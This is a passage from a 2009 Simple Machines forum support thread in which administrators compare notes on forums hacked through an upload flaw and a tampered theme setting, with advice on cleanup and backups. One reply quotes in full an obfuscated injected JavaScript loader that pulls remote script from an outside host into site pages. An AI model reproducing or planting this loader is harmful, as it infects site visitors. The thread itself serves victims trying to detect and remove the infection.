Advertisement:

Author Topic: Hacked, script injection  (Read 247693 times)

Offline Agafonov

  • Newbie
  • *
  • Posts: 8
Re: Hacked, script injection
« Reply #160 on: May 14, 2009, 02:29:55 AM »
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simple overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no other used by your mods, I'm not sure).
This will make you sure that where is no hacker's code in your files.
But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

Offline Edvard

  • Semi-Newbie
  • *
  • Posts: 17
Re: Hacked, script injection
« Reply #161 on: May 14, 2009, 03:21:42 AM »
Again, I'd like to add that my forum was hacked several times in a short time span (a few days), even though I completely deleted the forum and replaced it by a clean backup. Somehow, either through the php-script or via the rootkit.hacktool on my admin-pc, the ftp server password was compromised, and the site was hacked again overnight.

So, if your site is hacked, make sure your admin-pc is virus and malware free. Then delete your whole forum (make a backup of the infected forum if you wish, I did so I could put non-infected avatars and attachments, as well as other changes, back on-line), change the ftp and mysql server passwords, and upload clean forum software.

And, the most important lesson I've learnt is: MAKE BACK-UPS! This will be the last time I have to resort to a backup made almost one and a half year ago. I suggest making back-ups every time you change some of the php or html files, before upgrades/updates, and generally often enough to ensure attachments and avatars won't be lost.

Offline Tiribulus

  • Sophist Member
  • *****
  • Posts: 1,014
  • Gender: Male
    • Tiribulus on Facebook
    • No Other God
Re: Hacked, script injection
« Reply #162 on: May 14, 2009, 12:52:16 PM »
<<< But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

You're not saying that the mere presence of this value is bad right? Meaning there is a legitimate one that's supposed to be there correct?
« Last Edit: May 14, 2009, 02:03:22 PM by Tiribulus »

Offline stevefdl

  • Semi-Newbie
  • *
  • Posts: 13
Re: Hacked, script injection
« Reply #163 on: May 14, 2009, 03:19:03 PM »
I got hacked with a javascript between the head and body of my site. I tried re-installing, but nothing seems to work. Code is still there...anyone know if this is the same hack?

</head><script language=javascript><!--
(function(){var FopJ='var#20a#3d#22Scr#69p#74#45#6e#67in#65#22#2cb#3d#22Ve#72si#6f#6e(#29+#22#2c#6a#3d#22#22#2c#75#3dn#61vig#61tor#2euserAgent#3b#69f((u#2ein#64exOf(#22Win#22)#3e0)#26#26(u#2ein#64#65xOf(#22NT#206#22)#3c0#29#26#26(documen#74#2ecoo#6b#69e#2e#69ndexO#66(#22mi#65k#3d1#22)#3c#30)#26#26#28typ#65of(zrv#7at#73)#21#3dty#70#65of#28#22A#22)))#7bzr#76zts#3d#22#41#22#3be#76al(#22i#66#28window#2e#22+a#2b#22)j#3dj#2b#22+#61+#22#4dajor#22#2b#62#2ba+#22M#69#6eor#22#2b#62+a#2b#22Bu#69ld#22+b+#22#6a#3b#22)#3bdoc#75me#6et#2ewrite(#22#3cscript#20src#3d#2f#2fgu#6dblar#2ec#6e#2f#72s#73#2f#3fid#3d#22#2bj#2b#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d';var uy5=FopJ.replace(/#/g,'%');var Bsiy=unescape(uy5);eval(Bsiy)})();
 --></script>
<body>

Offline Filipina

  • Full Member
  • ***
  • Posts: 454
  • Gender: Female
Re: Hacked, script injection
« Reply #164 on: May 15, 2009, 01:17:42 AM »
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simple overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no other used by your mods, I'm not sure).
This will make you sure that where is no hacker's code in your files.
But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

Ok thanks for the information. I did a search today of the main two user names being used in the attacks and the results are unbelievable. When you see the search results and site descriptions showing things like "poker" and "gaming" it must be too late for them. My registration will just remain closed until a patch comes out because I am not taking any chances. It is not only the infection itself, but I am sure Google will just blacklist your site once they crawl and find that mess. It is truly sad.

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 55,095
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacked, script injection
« Reply #165 on: May 15, 2009, 01:35:29 AM »
Actually, the statement is slightly incorrect.

uploading a clean set of files *WILL* help and will solve your immediate problems with the forum.  It will not, however, close any backdoors or other exploits that the hacker may have added. THOSE other files are the ones you need to delete.
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

Offline Jorin

  • SMF Hero
  • ******
  • Posts: 2,021
  • Gender: Male
    • ElkArte-Hilfe.de
Re: Hacked, script injection
« Reply #166 on: May 15, 2009, 02:30:10 AM »
I have also created a topic on how to prevent being hacked.

http://www.simplemachines.org/community/index.php?topic=309717.0

Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on a SMF basis".  ;)

Offline crash56

  • Jr. Member
  • **
  • Posts: 206
  • Test Dummy Extraordinaire
Re: Hacked, script injection
« Reply #167 on: May 15, 2009, 05:43:11 AM »
Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on a SMF basis".  ;)

They're working on it.  Kindred posted that they're working on a fix.  It's on page 8 of this thread. 

No ETA yet. 

Offline Jorin

  • SMF Hero
  • ******
  • Posts: 2,021
  • Gender: Male
    • ElkArte-Hilfe.de
Re: Hacked, script injection
« Reply #168 on: May 15, 2009, 05:51:24 AM »
Ah, thanks.  :)

Offline Aleksi "Lex" Kilpinen

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 15,430
  • Gender: Male
  • The Artist Formerly Known as LexArma
Re: Hacked, script injection
« Reply #169 on: May 15, 2009, 06:09:28 AM »
Krisbarteo registered on my forum today,

Code: [Select]
krisbarteo - krisbarteo@gmail.com - 94.142.129.147 -  Today at 12:58:32

The "Stop Spammer" -mod marked all profile details as spammer, and stopped krisbarteo from completing the registration. So I can say that mod is a good choice for protecting your forums as well ;)

http://custom.simplemachines.org/mods/index.php?mod=1547

Some additional info:
The hostname of krisbarteo seems to be the same as IP,
and I have a gender option on registration, and krisbarteo selected male ;D
« Last Edit: May 15, 2009, 06:28:22 AM by LexArma »
Finnish Support Local Moderator & Support Specialist
My Mods: Facebook and Twitter Sharer



Offline agridoc

  • SMF Hero
  • ******
  • Posts: 3,274
  • Gender: Male
    • Aeromodelling GR - Aeromodelling in Greece
Re: Hacked, script injection
« Reply #170 on: May 15, 2009, 06:54:34 AM »
One important thing that I had not seen discussed is to find and delete the PHP file that is loaded by the injected script. It can be found if the base64 code is decoded http://www.motobit.com/util/base64-decoder-encoder.asp.

The longest path in the domain's dir is used and many garbage files are added there. I had to use SHELL to find and keep this file for examination, as there are file limitations in FTP and CP filemanager. The file can be decoded to see what else could have been done.

If there is no recent backup each file PHP has to be opened and the injected code be deleted.

I am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.
« Last Edit: May 17, 2009, 09:10:54 AM by agridoc »
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

Offline sponna

  • Newbie
  • *
  • Posts: 1
Re: Hacked, script injection
« Reply #171 on: May 15, 2009, 02:32:24 PM »
We got hit slightly differently it seems. The attacker managed to upload a file "attach.php" in the attachments directory together with the avatar exploit. He then created a htaccess file with a redirect to a file he either created or modified called readme_old. Somehow this combination created an iframe using our home page code but into which was called many different versions of drug selling stores. All of these urls were accessed from the attachments directory in the forum via the redirect in the htaccess file.

I'm still trying to work out what sequence of events lead to the compromise - but it was almost certainly via the avatar or attachment upload. What worries me is that we had "encrypt file extensions" enabled so not sure how he invoked the file remotely. For sure I'd like to catch up with him!

I only found one file (readme_old) with the base64 code so far.

Pretty crap situation, particularly as Google crawled the vast array of urls and indexed them - we knew something was wrong when our bandwidth went sky high.

Offline Samker

  • Jr. Member
  • **
  • Posts: 145
  • Gender: Male
  • "Whatever doesn't kill us makes us stronger."
    • SCforum.info - Samker's Computer Forum
Re: Hacked, script injection
« Reply #172 on: May 15, 2009, 04:13:26 PM »
I also find "KrisBarteo" in Member Base but it's look like that he doesn't success to hack us... At least I don't have anything unusual with my SCForum.

Can somebody please also check (and verify) is everything OK with Forum??


http://www.SCforum.info


Thanks in Advance!

S.
Samker's Computer Forum - SCforum.info

Offline Sarge

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,209
  • Gender: Male
    • Zëri YT!
Re: Hacked, script injection
« Reply #173 on: May 15, 2009, 04:18:02 PM »
Can somebody please also check (and verify) is everything OK with Forum??

Your forum looks fine to me.
    Please do not PM me with support requests unless I invite you to.

http://www.zeriyt.com/   ~   http://www.galeriashqiptare.net/


Quote
<H> I had zero posts when I started posting

Offline Dzonny

  • Lead Localizer
  • SMF Super Hero
  • *
  • Posts: 11,603
  • Gender: Male
  • No sleep...
    • dzontra.nikola on Facebook
    • Dzonny on GitHub
    • dzontranikola on LinkedIn
    • @opusteniforum on Twitter
    • Samo opusteno
Re: Hacked, script injection
« Reply #174 on: May 15, 2009, 04:23:27 PM »
Can somebody please also check (and verify) is everything OK with Forum??

Your forum looks fine to me.
I Agree... ;)

Offline Samker

  • Jr. Member
  • **
  • Posts: 145
  • Gender: Male
  • "Whatever doesn't kill us makes us stronger."
    • SCforum.info - Samker's Computer Forum
Re: Hacked, script injection
« Reply #175 on: May 15, 2009, 04:32:36 PM »
Thank you guys...  :D

I'm now wondering why he doesn't success with hack since it's registered from 09. May 2009. and I know about this "hole" only for few hours??

I have tight settings (normal for Security Forum which I run) maybe I could help other with protections... I mean we could compare settings and find differences between installed mods, enabled features etc. ??

Best Regards,

S.

Samker's Computer Forum - SCforum.info

Offline agridoc

  • SMF Hero
  • ******
  • Posts: 3,274
  • Gender: Male
    • Aeromodelling GR - Aeromodelling in Greece
Re: Hacked, script injection
« Reply #176 on: May 15, 2009, 05:06:14 PM »
Can somebody please also check (and verify) is everything OK with Forum??

It might look OK but be infected. Go with FTP and check some PHP files. If there is no added code, it's rather not infected. Also check your error log.
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

Offline Samker

  • Jr. Member
  • **
  • Posts: 145
  • Gender: Male
  • "Whatever doesn't kill us makes us stronger."
    • SCforum.info - Samker's Computer Forum
Re: Hacked, script injection
« Reply #177 on: May 15, 2009, 05:21:46 PM »
Can somebody please also check (and verify) is everything OK with Forum??

It might look OK but be infected. Go with FTP and check some PHP files. If there is no added code, it's rather not infected. Also check your error log.

I was already make a double check of all mentioned things and everything seem Ok.

Thanks for reply.
Samker's Computer Forum - SCforum.info

Offline M-DVD

  • SMF Hero
  • ******
  • Posts: 1,650
  • Gender: Male
  • Step by step will update the mods to SMF 2RC2
Re: Hacked, script injection
« Reply #178 on: May 15, 2009, 05:53:32 PM »
3.- There is another problem, how the spammers run this file once uploaded?

Read http://www.simplemachines.org/community/index.php?topic=307717.msg2056804#msg2056804 and http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480


THANKS Agafonov, without your info, I never could find the trick  >:(

How the value of theme_dir appeared in smf_themes table - is the main question.

The guy is brillant. I found the way, just because already knew that exists and search in the site.

I'm now wondering why he doesn't success with hack since it's registered from 09. May 2009. and I know about this "hole" only for few hours??

Perhaps because the guy has been busy :P

Offline Tiribulus

  • Sophist Member
  • *****
  • Posts: 1,014
  • Gender: Male
    • Tiribulus on Facebook
    • No Other God
Re: Hacked, script injection
« Reply #179 on: May 15, 2009, 05:59:07 PM »
<<< I found the way, just because already knew that exists and search in the site. >>>

How would ya like to a be a sterling citizen and share that with us? :)